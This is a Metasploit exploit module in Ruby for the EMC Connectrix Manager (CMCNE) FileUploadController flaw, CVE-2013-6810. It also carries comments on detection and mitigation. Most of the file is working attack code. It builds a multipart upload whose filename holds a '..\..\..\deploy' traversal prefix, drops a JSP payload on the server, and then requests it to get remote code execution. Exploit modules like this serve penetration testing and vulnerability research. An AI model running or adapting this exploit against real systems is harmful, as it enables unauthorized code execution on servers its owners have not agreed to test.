require 'msf/core'
# Exploit module for the EMC CMCNE FileUploadController file-upload flaw
# (ZDI-13-279 / CVE-2013-6810, affects EMC CMCNE <= 11.2.1 per the module
# description). The module posts a multipart upload whose `filename` field
# carries a directory-traversal prefix, then requests the dropped JSP.
#
# Defender notes (derived from the requests this module sends):
#   * Detection: a POST to HttpFileUpload/FileUploadController.do whose
#     multipart "source" part has a filename containing `..\` sequences,
#     followed shortly by a GET for dcm-client/<random alphanumeric>.jsp.
#   * Mitigation: the root cause is the servlet trusting the client-supplied
#     filename; apply the vendor fix tracked under the references above and
#     restrict network access to the management interface.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata (name, description, references, target) and the
  # single option RPORT, defaulting to 80.
  #
  # @param info [Hash] framework-supplied module info to merge into
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'EMC CMCNE FileUploadController Remote Code Execution',
      'Description'    => %q{
        This module exploits a file upload vulnerability found in EMC Connectrix
        Manager Converged Network Edition <= 11.2.1. The file upload
        vulnerability is triggered when sending a specially crafted filename to
        the FileUploadController servlet. This allows the attacker to upload a
        malicious jsp file to anywhere on the remote file system.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'james fitts' ],
      'References'     => [
        [ 'ZDI', '13-279' ],
        [ 'CVE', '2013-6810' ]
      ],
      'Privileged'     => true,
      'Platform'       => 'win',
      'Arch'           => ARCH_JAVA,
      'Targets'        => [
        [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
      ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 18 2013'))

    # Legacy two-argument form of register_options (second arg is the
    # owning class); newer framework code omits the second argument.
    register_options([Opt::RPORT(80)], self.class)
  end

  # Uploads the JSP payload via the multipart endpoint and, on a success
  # response, requests it once so the server executes it.
  #
  # Flow: build multipart body -> POST FileUploadController.do -> check for
  # the success banner -> GET dcm-client/<name>.jsp.
  def exploit
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

    # Traversal prefix prepended to the multipart filename. This is the
    # vulnerability itself: the servlet uses the client-controlled filename
    # (including `..\` components) to decide where the file is written.
    deploy = "..\\..\\..\\deploy\\dcm-client.war\\"

    # Strip CRLF / LF from the encoded payload so it fits on one line of the
    # multipart part body.
    jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")

    # Random 4..31 character alphanumeric name with a .jsp extension; kept on
    # the instance so the follow-up GET below can reference it.
    @jsp_name = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp"

    data = Rex::MIME::Message.new
    # "source" part: the file content, with the traversal prefix + random name
    # as its filename.
    data.add_part("#{jsp}", "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
    # "driverFolderName" part: filler value; presumably required by the
    # servlet's form handling — not verified here.
    data.add_part("#{rand_text_alpha_upper(5)}", nil, nil, "form-data; name=\"driverFolderName\"")

    # Remove the leading CRLF before the first "--_Part_" boundary so the body
    # starts directly with the boundary line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

    print_status("#{peer} - Uploading the JSP Payload...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri("HttpFileUpload", "FileUploadController.do"),
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # NOTE(review): send_request_cgi can return nil when the connection fails,
    # in which case `res.code` raises NoMethodError rather than reaching the
    # else branch; a nil guard (`res && res.code == 200`) would be safer.
    # Success is judged solely by the status code and the banner regex below.
    if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
      print_good("File uploaded successfully!")
      print_status("Executing '#{@jsp_name}' now...")
      # Second request: fetch the dropped JSP under the dcm-client web app so
      # the container compiles and runs it. Return value is not inspected.
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri("dcm-client", "#{@jsp_name}")
      })
    else
      print_error("Does not look like the files were uploaded to #{peer}...")
    end
  end
end